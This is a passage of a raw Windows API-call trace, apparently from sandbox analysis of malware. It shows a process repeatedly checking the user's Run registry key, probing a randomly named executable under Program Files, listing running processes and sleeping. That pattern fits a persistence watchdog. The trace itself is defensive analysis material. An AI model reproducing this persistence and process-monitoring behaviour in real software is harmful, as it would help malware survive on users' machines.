ResultLength=0x0) returned 0x0 [0176.332] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0176.333] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0176.343] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0176.344] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0176.344] NtClose (Handle=0x14c) returned 0x0 [0176.344] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.344] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.344] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.344] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.344] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.344] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.344] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0176.345] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0176.345] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0176.345] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0176.345] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0176.347] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0176.348] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0176.359] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0176.359] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0176.359] NtClose (Handle=0x14c) returned 0x0 [0176.359] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.359] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.359] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.359] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.359] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.359] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.359] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0176.360] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0176.360] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0176.361] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0176.361] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0176.363] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0176.364] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0176.374] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0176.375] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0176.375] NtClose (Handle=0x14c) returned 0x0 [0176.375] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.375] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.375] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.375] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.375] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.375] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.375] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0176.376] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0176.376] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0176.376] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0176.377] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0176.379] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0176.380] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0176.390] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0176.391] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0176.391] NtClose (Handle=0x14c) returned 0x0 [0176.391] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.391] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.391] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.391] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.391] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.391] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.391] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0176.392] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0176.392] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0176.392] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0176.393] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0176.395] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0176.396] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0176.405] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0176.406] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0176.406] NtClose (Handle=0x14c) returned 0x0 [0176.407] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.407] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.408] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.408] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.408] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.408] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.408] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0176.408] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0176.409] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0176.409] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0176.410] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0176.412] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0176.413] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0176.428] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0176.428] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0176.429] NtClose (Handle=0x14c) returned 0x0 [0176.429] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.429] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.429] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.429] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.429] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.429] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.429] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0176.429] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0176.430] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0176.430] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0176.430] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0176.433] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0176.434] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0176.457] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0176.457] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0176.457] NtClose (Handle=0x14c) returned 0x0 [0176.457] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.457] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.457] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.457] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.457] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, 